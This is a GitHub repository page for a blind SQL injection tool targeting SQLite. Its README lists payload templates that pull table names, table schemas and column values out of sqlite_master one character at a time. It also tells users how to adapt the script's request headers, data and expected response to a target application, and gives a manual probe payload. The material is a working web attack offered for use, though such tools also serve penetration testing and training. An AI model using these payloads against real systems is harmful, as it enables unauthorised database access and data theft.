Skip to content

This is a repository about blind sql injection for sqlite database.

License

Notifications You must be signed in to change notification settings

aykutcanustun/SQLiteBLINDInjection

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

29 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

SQLiteBLINDInjection
Author: aykutcanustun

How To Set Queries:

To retrieve table names from database:
' or UNICODE(SUBSTR((SELECT name FROM sqlite_master WHERE type='table'),{},1)){} {} --

To retrieve table schema:
' or UNICODE(SUBSTR((SELECT sql FROM sqlite_master WHERE tbl_name='$TABLE_NAME'),{},1)){} {} --

To retrieve values inside column:
' or UNICODE(SUBSTR((SELECT $COLUMN_NAME FROM sqlite_master WHERE tbl_name='$TABLE_NAME'),{},1)){} {} --

Replace $TABLE_NAME and $COLUMN_NAME with data that you retrieved from privious query!

How To Set Varibles:

To use the script, you have to set varibles according to your request's header, data and response etc.
I marked these lines with comments in main.py!
Make changes at these lines:
replacements
Replace "username" string with your request's data as below:
request
You have to make this request manually to see what is the response:
' or UNICODE(SUBSTR((SELECT name FROM sqlite_master WHERE type='table'),1,1)) < 128 --
And replace "Data Sent!" string according to your manual request's reply:
response